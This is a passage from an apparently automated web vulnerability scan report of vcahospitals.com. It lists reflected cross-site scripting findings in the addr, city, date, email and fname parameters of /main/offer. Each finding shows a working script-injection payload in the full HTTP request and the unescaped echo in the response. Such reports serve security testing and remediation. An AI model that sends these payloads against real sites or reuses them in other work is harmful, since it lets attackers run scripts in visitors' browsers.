The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e30"><script>alert(1)</script>0f7c5167de6 was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=d4e30"><script>alert(1)</script>0f7c5167de6&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ceoonhufna4nqjnbadvlk4olp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=d4e30"><script>alert(1)</script>0f7c5167de6&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&sub
...[SNIP]...

2.22. http://www.vcahospitals.com/main/offer [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5398c"><script>alert(1)</script>87df2a8d4cb was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7lu4jl5rh2o7n9k5h17md6nq97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Ge
...[SNIP]...

2.23. http://www.vcahospitals.com/main/offer [date parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5640a"><script>alert(1)</script>ae7e41b90f2 was submitted in the date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ggd6ft9v06ns03acajkmsv7l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&to
...[SNIP]...

2.24. http://www.vcahospitals.com/main/offer [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 301c8"><script>alert(1)</script>a34d170cc15 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=70e0blfdjoh05e8704s1uokj93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa1
...[SNIP]...

2.25. http://www.vcahospitals.com/main/offer [fname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92a"><script>alert(1)</script>7d4cd1323ce was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:14 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v41mjjvjtb395bfee89ffekb73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

